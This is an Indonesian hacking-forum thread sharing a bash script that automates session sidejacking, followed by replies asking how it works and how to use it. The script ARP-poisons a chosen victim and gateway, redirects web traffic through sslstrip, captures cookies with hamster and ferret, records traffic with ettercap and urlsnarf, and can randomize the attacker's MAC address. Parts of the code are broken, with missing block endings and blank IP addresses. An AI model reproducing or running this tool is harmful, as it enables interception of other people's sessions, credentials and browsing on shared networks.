script untuk sidejacking..
Sidejacking neeh... yang gk ngerti post di mari .. thx


# v0.1
# tested in backtrack 4 R2 environment, run as root.
# xterm used for window control
# arpspoof poisons a single victim and gateway
# ferret and hamster for sidejacking
# sslstrip for https
# ettercap for everything else
# urlsnarf to monitor visited urls
# firefox needs to be configured with a proxy of
# url for hamster server is http://hamster
# by gorara

# a few variables (do not change)
m1="0"                    # missing file var m1
m2="0"                    # missing file var m2
m3="0"                    # missing file var m3
m4="0"                    # missing file var m4
quickclean="0"                # used for quick clean up
randmac="n"                # default setting do not randomize MAC
hamsterfile="hamster.txt"        # hamster output file (you can't change it)
trap 'cleanup' SIGINT SIGTERM        # detect control-c

# a few more variables (change these if required)

# xterm window variables
x="0"                    # x offset value
y="0"                    # y offset value
width="120"                # width value
height="7"                # height value
yoffset="120"                # y offset
fgcolor="white"                # foreground color
bgcolor="black"                # background color

# style variables
warnstyle="[\e[01;38mw\e[00m]"        # warning msgs style
execstyle="[\e[01;32mx\e[00m]"        # execute msgs style
infostyle="[\e[01;34mi\e[00m]"        # informational msgs style
inputstyle="[\e[01;30m?\e[00m]"        # input msgs style

# file variables
sslstripfile="sslstrip.log"        # sslstrip output file name
snifffile="sniff-*"            # hamster sniff file wildcard
etterfile="etter.cap"            # ettercap output cap file
temp="/tmp"                # temporary dir

function usage
    echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]"
    echo ""
    echo "    -i interface    interface to use, ex. eth0, wlan0."
    echo "    -t target    the target IP address."
    echo "    -g gateway    the gateway IP address."
    echo "    -r        randomize your MAC address,"
    echo "            only use for wired interfaces."
    echo "    -h        display this help screen."
    echo ""
    echo "    examples: "
    echo "     bash $0 -i eth0 -t -g -r"
    echo "     bash $0 -i wlan0 -t -g"
    echo ""
    exit 0

function cleanup() {
echo -e "\n$warnstyle control-c pressed! "

# exit script if nothing has been modified
if [[ "$quickclean" = "1" ]]; then
echo -e "$infostyle nothing changed, all done!"
exit 0

echo -e "$infostyle cleaning up..."
echo -e "$execstyle flushing iptables..."
iptables -F
iptables -t nat -F

echo -e "$execstyle turning off IP forwarding..."
echo "0" > /proc/sys/net/ipv4/ip_forward

# change back MAC address to orignal one
if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
echo -e "$execstyle resetting MAC address...";
echo -e "$infostyle original MAC is: $origmac"
ifconfig $interface down
ifconfig $interface hw ether $origmac
ifconfig $interface up
    if [ -z $gw ]; then
    echo -e "$warnstyle WARNING, you have no default gateway!"
    route add default gw $gw
rm $temp/mac.orig
rm $temp/gw.orig

echo -e "$execstyle cleaning up files..."
echo -e "$infostyle temp directory: "

# testing to see if files exist, if so display them...
    if [ -f $temp/$sslstripfile ]; then
    ls $temp/$sslstripfile
    #echo -e "$warnstyle missing $sslstripfile"

    if [ -f $temp/$etterfile ]; then
    ls $temp/$etterfile
    #echo -e "$warnstyle missing $etterfile"

echo -e "$infostyle current directory: "

    if [ -f $snifffile ]; then
    ls $snifffile
    #echo -e "$warnstyle missing $snifffile"

    if [ -f $hamsterfile ]; then
    ls $hamsterfile
    #echo -e "$warnstyle missing $hamsterfile"

# testing to see if there are any files at all
if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then

while [[ "$delete" != "y" || "$delete" != "n" ]]

echo -en "$infostyle delete file(s)? [y/n]: "
read delete

    case "$delete" in
        y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;;
    n) echo -e "$warnstyle nothing deleted!"; break;;
        *) echo -e "$warnstyle wrong selection!";

# delete files as requested
if [[ "$delete_marker" = "y" ]]; then
    if [ -f $temp/$sslstripfile ]; then
    rm $temp/$sslstripfile

    if [ -f $temp/$etterfile ]; then
    rm $temp/$etterfile

    if [ -f $snifffile ]; then
    rm $snifffile

    if [ -f $hamsterfile ]; then
    rm $hamsterfile


    echo -e "$warnstyle nothing to delete!"

echo -e "$infostyle all done!"
exit 0

# start main program
if [ "$#" -eq 0 ]; then

while [ "$#" -gt 0 ]
    case "$1" in
        -i)  interface=$2; shift 1;;
    -r)  randmac="y"; shift 1;;
    -t)  target=$2; shift 1;;
    -g)  gateway=$2; shift 1;;
    -h)  usage;;
    -*)  usage; break;;
    *)  break;;

# required parameters
if [[ -z $interface || -z $target || -z $gateway ]]; then
exit 0


if [[ "$randmac" = "y" ]]; then

# set quick cleanup flag

echo -e "$infostyle sidejacker/sslstrip script v0.1, by gorara"
echo -e "$infostyle ctrl-c to abort at any time."
echo -e "$infostyle attack summary:"
echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac"

if [[ "$randmac" = "y" ]]; then

echo -e "$execstyle change of $interface MAC address requested."

if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then
echo -e "$infostyle wireless device detected..."
echo -e "$warnstyle can't change MAC address without taking wifi interface down"
echo -e "$warnstyle do it manually before connecting to the AP."
exit 0

if [[ "$interface" = eth* ]]; then
echo -e "$infostyle wired device detected..."
echo -e "$warnstyle WARNING, this will take your wired interface down temporarily."
echo -en "$inputstyle do you want to continue? [y/n]: "
read continue
    if [[ "$continue" = "y" ]]; then
    echo -e "$infostyle proceeding..."
    echo -e "$infostyle exiting..."
    exit 0    

origmac=`ifconfig $interface | grep HWaddr | awk {'print $5'}`


# before this, ctrl-c will exit script without doing anything.

# use macchanger to randomize MAC address, ect.
if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
echo -e "$execstyle randomizing MAC address...";
gw=`route -n | grep UG | awk {'print $2'}` > $temp/gw.orig
ifconfig $interface down
macchanger -r $interface > $temp/mac.orig
ifconfig $interface up
    if [ -z $gw ]; then
    echo -e "$warnstyle WARNING, you have no default gateway!"
    route add default gw $gw
origmac=`cat $temp/mac.orig | grep Current | awk {'print $3'}`
fakemac=`cat $temp/mac.orig | grep Faked | awk {'print $3'}`
echo -e "$infostyle original MAC is: $origmac"
echo -e "$infostyle faked    MAC is: $fakemac"

echo -e "$execstyle turning on IP Forwarding..."
echo "1" > /proc/sys/net/ipv4/ip_forward

echo -e "$execstyle configuring iptables..."
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 1

echo -e "$execstyle starting hamster  ... <logging to: $hamsterfile>"
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster &
sleep 2

echo -e "$execstyle starting ferret   ... <logging to: console>"
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface &
sleep 2

echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>"
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -w $temp/$sslstripfile &
sleep 2

echo -e "$execstyle starting ettercap ... <logging to: $temp/$etterfile>"
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -Tqpi $interface -w $temp/$etterfile /$gateway/ /$target/ &
sleep 2

echo -e "$execstyle starting urlsnarf ... <logging to: console>"
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface &
sleep 2

echo -e "$infostyle trap is ready, now to direct traffic..."

echo -e "$execstyle ARP poisoning the target..."
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway &
sleep 1

echo -e "$infostyle run firefox and type http://hamster"
echo -e "$infostyle don't forget to set proxy to"
echo -e "$infostyle press ctrl-c to exit and clean up... \n"
for ((;;)) do
read loop
echo -en "$infostyle press ctrl-c to terminate!"

exit 0
nanti bro kalo ane bikin tools deh .. soalnya ini tools nemu di jalan Tongue
ok ok seep ane submit .. Smile
pengertian sidejacking apaan tuh om ?

( lagi males tanya google :p )

side jacking itu pencurian data yang memanfaatkan fasilitas cookies?
betul gk yaaa Big Grin Big Grin

widiiih ini script memanfaatkan hamster sama ferret ya om? suram dah wkwkwk

ane mo tanya yg ini:

Quote:# firefox needs to be configured with a proxy of

itu firefox kita untuk nangkep cookies orang lain harus di konfig pake http proxy port 1234 ya?
pdhl di scriptnya kan ga ada proxy bro? ato ane kurang jeli lihatnya ya?


(08-29-2011, 03:07 AM)konspirasi Wrote: widiiih ini script memanfaatkan hamster sama ferret ya om? suram dah wkwkwk

ane mo tanya yg ini:

Quote:# firefox needs to be configured with a proxy of

itu firefox kita untuk nangkep cookies orang lain harus di konfig pake http proxy port 1234 ya?
pdhl di scriptnya kan ga ada proxy bro? ato ane kurang jeli lihatnya ya?


kayaknya itu untuk ngebuka hamster di browser !! cz hamster aktif di port 1234 itu !! kayaknya seh gitu om !!!

(08-29-2011, 03:16 AM)RR12 Wrote:
(08-29-2011, 03:07 AM)konspirasi Wrote: widiiih ini script memanfaatkan hamster sama ferret ya om? suram dah wkwkwk

ane mo tanya yg ini:

Quote:# firefox needs to be configured with a proxy of

itu firefox kita untuk nangkep cookies orang lain harus di konfig pake http proxy port 1234 ya?
pdhl di scriptnya kan ga ada proxy bro? ato ane kurang jeli lihatnya ya?


kayaknya itu untuk ngebuka hamster di browser !! cz hamster aktif di port 1234 itu !! kayaknya seh gitu om !!!

woogh iya bro, maaf baru nyoba hamster nih Smile
ketika ane coba muncul gini:
Quote:root@bt:/pentest/sniffers/hamster# ./hamster
--- HAMPSTER 2.0 side-jacking tool ---
begining thread
Set browser to use proxy
DEBUG: set_ports_option(1234)
DEBUG: mg_open_listening_port(1234)
Proxy: listening on


hmm sidejacking... kayaknya cakep nih...
coba dulu ya om, tapi nnti.. Smile
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

cara makenya gmana om?

